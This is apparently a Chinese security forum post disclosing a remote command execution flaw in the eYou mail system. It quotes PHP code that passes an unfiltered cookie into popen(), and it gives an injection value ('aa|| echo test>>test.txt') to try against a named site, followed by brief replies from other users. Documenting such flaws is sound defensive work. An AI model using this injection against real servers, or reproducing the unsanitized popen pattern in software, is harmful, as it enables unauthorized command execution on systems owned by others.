eYou邮件系统远程命令执行
#1 漏洞代码/grad/admin/domain_logo.php
<?php
/**修改:王磊
*修改时间:2007-04-09
*修改内容:判断域LOGO的路径
*
*/
$domain = $_COOKIE['cookie'];//接收cookie值,无任何过滤
$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');//直接带进了危险函数popen 执行任意命令
$res = fread($fp,1024);
header('Content-type:image/rgb');
$path = "/var/eyou/Domain/".substr($res,-5,2).$domain."/LOGO/domain_logo";
$fp = file($path);
foreach($fp as $key => $val){
print($val);
}
exit;
?>
$domain = $_COOKIE['cookie'];
//接收cookie值,无任何过滤
$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');
//直接带进了危险函数popen 可远程执行任意命令
#2 漏洞利用
访问http://secmap.cn/grad/admin/domain_logo.php
修改cookie 值为:aa|| echo test>>test.txt 刷新 便可以在该目录下生成test.txt
大牛 前排出售基督菊花 看看、学习!!! {:soso_e146:}求exp大牛威武
页:
[1]